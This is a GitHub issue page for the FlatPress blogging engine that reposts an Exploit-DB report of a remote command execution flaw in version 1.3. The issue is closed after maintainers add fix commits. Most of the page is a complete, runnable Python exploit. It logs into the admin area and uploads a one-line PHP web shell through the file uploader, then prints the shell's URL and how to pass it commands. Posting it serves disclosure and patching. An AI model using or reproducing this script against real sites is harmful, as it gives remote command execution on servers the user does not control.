search

flatpressblog / flatpress

FlatPress is a lightweight, easy-to-set-up flat-file blogging engine.
https://flatpress.org
GNU General Public License v2.0
186 stars 57 forks source link

EDB-ID: 51997 | The login area and the uploader is vulnerable to RCE #451

Closed Fraenkiman closed 1 month ago

Fraenkiman commented 1 month ago

Reported by Ahmet Ümit BAYRAM on https://www.exploit-db.com/

Thank you for reporting

Content:

# Exploit Title: FlatPress v1.3 - Remote Command Execution
# Discovered Date: 19.04.2024
# Vendor Homepage: https://www.flatpress.org
# Software Link: https://github.com/flatpressblog/flatpress/archive/1.3.zip
# Tested Version: 1.3 (latest)
# Tested on: MacOS

import requests
import time
import random
import string

def random_string(length=5):
    """Rastgele bir string oluşturur."""
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for i in range(length))

def login_and_upload(base_url, username, password):
    filename = random_string() + ".php"
    login_url = f"http://{base_url}/login.php"
    upload_url = f"http://{base_url}/admin.php?p=uploader&action=default"

    with requests.Session() as session:
        # Exploiting
        print("Exploiting...")
        time.sleep(1)

        # Giriş yapma denemesi
        login_data = {
        'user': username,
        'pass': password,
        'submit': 'Login'
        }
        print("Logging in...")
        response = session.post(login_url, data=login_data)
        time.sleep(1)

        if "Logout" in response.text:
            print("Login Successful!")
        else:
            print("Login Failed!")
            print(response.text)
            return

        # Dosya yükleme denemesi
        print("Shell uploading...")
        time.sleep(1)

        # Form verileri ve dosyalar
        files = {
        'upload[]': (filename, '<?=`$_GET[0]`?>', 'text/php'),
        }
        form_data = {
        '_wpnonce': '9e0ed04260',
        '_wp_http_referer': '/admin.php?p=uploader',
        'upload': 'Upload'
        }

        response = session.post(upload_url, files=files, data=form_data)

        if "File(s) uploaded" in response.text or "Upload" in response.text:
            shell_url = f"http://{base_url}/fp-content/attachs/{filename}"
            print(f"Your Shell is Ready: {shell_url}")
            time.sleep(1)
            print(f"Shell Usage: {shell_url}?0=command")
        else:
            print("Exploit Failed!")
            print(response.status_code, response.text)

# Örnek kullanım: python script.py siteadi.com username password
if __name__ == "__main__":
    import sys
    if len(sys.argv) != 4:
        print("Usage: script.py <base_url> <username> <password>")
    else:
        base_url, username, password = sys.argv[1:]
        login_and_upload(base_url, username, password)

Link to the original report

justrudra commented 1 month ago

@Fraenkiman So your flatpress powered blog's contact form does send emails to you successfully. ;) I had tried to reach you with this report that day and took the help of your contact form. Since the date of the release of this report was before the release of Flatpress 1.3.1, so I was trying to understand if this was taken care of. But none the less it is good that this issue is on your radar now.

Fraenkiman commented 1 month ago

Closed with 472d0b1 and b8dc792